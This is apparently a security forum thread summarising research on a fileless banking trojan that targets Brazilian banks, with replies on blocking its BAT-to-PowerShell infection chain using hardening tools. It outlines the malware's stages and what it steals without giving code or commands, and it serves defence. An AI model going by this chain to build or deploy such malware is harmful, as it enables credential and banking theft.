Fileless Banking Trojan Targeting Brazilian Banks

LASER_oneXM

Level 37
Thread author
Verified
Top Poster
Well-known
Feb 4, 2016
2,520
We analyzed a fileless malware with multiple .BAT attachments and a batch file from IoCs reported by researchers online that was capable of opening an IP address, downloading a PowerShell with a banking trojan payload, and installing a hack tool and an information stealer. Looking further, we observed it stealing machine information and user credentials, scanning for strings related to three specific Brazilian banks (Banco Bradesco, Banco do Brasil, and Sicredi) and other possible network connections via saved Outlook contacts, and installing the hack tool RADMIN. Our telemetry showed the highest infection attempts in Brazil and Taiwan.

Aside from accessing users’ banking accounts, the stolen PII gathered from the visited websites and recorded machine credentials can be further abused or sold. Also, considering the wide financial services and customer bases of these three targeted banks, we are following this developing threat as it can be used for bigger botnet or mass-mailed targeted attacks.
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,040
Maybe in Brasil, people do not use hardening tools?

Simple infection chain:

email attachment (BAT file) --> Command shell (cmd.exe) ---> PowerShell commands ---> download the payloads ---> etc.

There are known free tools that prevent running BAT files (SysHardener, HardenTools, H_C). Furthermore the PowerShell download command from this payload will fail, when PowerShell is set to Constrained Language mode (SysHardener tweaked, H_C) or PowerShell is blocked from running with cmd.exe (H_C enhanced profile), or PowerShell outbound connections are blocked by Windows Firewall (SysHardener).
 

shmu26

Level 85
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Jul 3, 2015
8,150
Maybe in Brasil, people do not use hardening tools?

Simple infection chain:
email attachment (BAT file) --> Command shell (cmd.exe) ---> PowerShell commands ---> download the payloads ---> etc.

There are known free tools that prevent running BAT files (SysHardener, HardenTools, H_C). Furthermore the PowerShell download command from this payload will fail, when PowerShell is set to Constrained Language mode (SysHardener tweaked, H_C) or PowerShell is blocked from running with cmd.exe (H_C enhanced profile), or PowerShell outbound connections are blocked by Windows Firewall (SysHardener).
Also Comodo at CS settings should stop those BAT files. And I think OSA has a specific rule for blocking powershell commands that are passed by cmd.exe.
 

Nightwalker

Level 24
Verified
Honorary Member
Top Poster
Content Creator
Well-known
May 26, 2014
1,339
How come banking trojans are always attacking Brazil? This sounds sooooo familiar.

Brazilian hackers groups are very active and clever, they are very similar to how russian groups act, so it isnt strange to see many novel techniques implementend in banking trojans.

Financial malware are more than twice as prevalent as ransomware and there is a reason for that (easy "revenue") ...
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,040
Also Comodo at CS settings should stop those BAT files. And I think OSA has a specific rule for blocking powershell commands that are passed by cmd.exe.
Comodo will not block the BAT file. Comodo and some good Avs can be tweaked to stop this malware when it will try to use PowerShell. For example, Kaspersky Application Control can be used to restrict PowerShell. There are some more programs based on their own drivers which can stop this malware (Excubits drivers, OSArmor, NVT ERP, VoodooShield, tweaked Sandboxie, tweaked ReHIPS, etc.).
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top